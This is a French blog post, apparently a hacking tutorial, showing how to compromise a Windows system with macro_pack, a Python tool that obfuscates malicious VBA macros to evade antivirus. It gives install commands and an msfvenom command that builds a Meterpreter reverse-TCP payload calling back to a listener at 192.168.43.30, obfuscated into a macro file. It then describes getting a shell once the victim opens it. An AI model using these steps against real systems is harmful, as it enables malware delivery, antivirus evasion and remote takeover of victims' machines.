macro_pack est un outil hacking écrit en Python3 fournissant une méthode avancée d’obfusquation de fichiers Macro malicieux. L’objectif de cet outil, selon son auteur, est de simplifier l’exploitation des systèmes et le contournement des antimalwares/antivirus.
Cet outil est compatible avec tous les payloads générés par les frameworks de pentest tels que Metasploit, Empire, etc.

Installation

Clonez le repo de l’outil:

# git clone https://github.com/sevagas/macro_pack.git

Puis, installez les dépendances requises pour l’installation de macro_pack.

# cd macro_pack
# pip3 install -r requirements.txt

Enfin, lancez le script macro_pack.py disponible dans le dossier macro_pack/src:

# python3 macro_pack.py

Voici le menu d’aide de macro_pack:

Exemple d’utilisation

Créeons un fichier vba malicieux.
La commande ci-dessous permet d’obfusquer le fichier vba généré par msfvenom. Le résultat est enregistré dans un nouveau fichier vba qui sera sauvegardé dans le dossier macro_pack/src.

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.30 -f vba | macro_pack.py -o -G macro.vba

Créeons un script Meterpreter, puis lançons msfconsole à partir de ce script.

A l’exécution du macro vba par la victime, nous obtenons un shell.

Happy Hacking !

mdestroy

The post Comment pirater un système Windows à l’aide d’un fichier Macro ? appeared first on Homputer Security.